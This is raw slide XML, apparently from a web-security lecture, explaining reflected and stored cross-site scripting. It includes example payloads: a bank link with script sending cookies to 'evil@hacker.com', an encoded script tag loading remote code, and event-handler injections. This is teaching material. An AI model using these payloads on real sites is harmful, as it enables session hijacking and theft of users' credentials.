              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>page</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>What is the same origin of the JavaScript code?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The malicious code </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Can access all the information that a user stored in association with the trusted site </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Can access the session token in a cookie and reuse it to login into the same trusted site as the user, provided that the user </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>has </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>a current session with that site</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Can open a form that appears to be from the trusted site and steal PINs and passwords</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8458200" y="6400800"/>
            <a:ext cx="685800" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{BD5F6748-727B-F942-A49F-96C7BB40957B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>42</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3155313211"/>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Steal Login Data</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="8" name="Group 7"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="0" y="546100"/>
            <a:ext cx="9144000" cy="5749690"/>
            <a:chOff x="0" y="546100"/>
            <a:chExt cx="9144000" cy="5749690"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="6" name="Picture 5" descr="Screen Shot 2015-02-26 at 11.13.18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46100"/>
              <a:ext cx="9144000" cy="5749690"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="7" name="Picture 6" descr="Screen Shot 2015-02-26 at 11.12.57 AM.png"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill rotWithShape="1">
            <a:blip r:embed="rId3">
              <a:extLst>
                <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                  <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                </a:ext>
              </a:extLst>
            </a:blip>
            <a:srcRect l="14796" t="3009" b="-2"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="1621596" y="849373"/>
              <a:ext cx="3428898" cy="153342"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="315141515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60194" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Reflected Cross-Site Scripting</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1160195" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Broken links are a pain and sometimes a site tries to be user-friendly by providing meaningful error messages:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&lt;html&gt;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>[…]</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>404 page does not exist: ~</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>vigna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>secrets.html</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&lt;/html&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The attacker lures the user to visit a page written by the attacker and to follow a link to a sensitive, trusted site</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The link is in the form:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&lt;a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>="http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>www.usbank.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>/&lt;script&gt;send-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>CookieTo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>evil@hacker.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>)&lt;/script</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&gt;"&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>US Bank&lt;/a&gt; </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8458200" y="6400800"/>
            <a:ext cx="685800" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{BD5F6748-727B-F942-A49F-96C7BB40957B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>44</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3479556505"/>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68386" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Simple XSS Example</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1168387" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>There is an XSS vulnerability in the code. The input is not being validated so JavaScript code can be injected into the page!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>If we enter the URL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>text.pl?msg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>=&lt;script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>alert(“I</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> 0wn you”)&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>We can do “anything” we want. E.g., we display a message to the user… worse: we can steal sensitive information.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>document.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> identifier in JavaScript, we can steal cookies and send them to our server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>We can e-mail this URL to thousands of users and try to trick them into following this link (a reflected XSS attack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8458200" y="6400800"/>
            <a:ext cx="685800" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{BD5F6748-727B-F942-A49F-96C7BB40957B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>45</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="511802945"/>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9410" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Stored Cross-Site Scripting</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1169411" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cross-site scripting can also be performed in a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>two-step </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>attack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>First the JavaScript code </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>attacker is stored in a database </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>as part of a message</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Then the victim downloads and executes the code when a page containing the attacker’s input is viewed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Any web site that stores user </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>content, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>without sanitization, is vulnerable to this attack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Bulletin board systems</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Blogs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Directories</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8458200" y="6400800"/>
            <a:ext cx="685800" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{BD5F6748-727B-F942-A49F-96C7BB40957B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>46</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="372683410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694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694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6941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6941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6941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69411">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6941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dirty="0" smtClean="0"/>
              <a:t>Executing JavaScript</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JavaScript can be executed and encoded in many different ways</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>See </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Rsnake’s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>"XSS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Cheat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Sheet" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>at </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://ha.ckers.org/xss.html</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Simple: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&lt;script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>alert(document.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>);&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Encoded: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>%3cscript </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>=http://www.example.com/malicious-code.js%3e%3c/script%3e</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Event handlers: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&lt;body </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>onload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>=alert</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>('XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>')&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&lt;b </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>onmouseover</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>=alert</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>('XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>')&gt;click me!&lt;/b&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>img</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>="http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>url.to.file.which</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>not.exist</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>onerror</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>=alert</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>'X</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>SS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>;&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Image tag (with UTF-8 encoding): </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
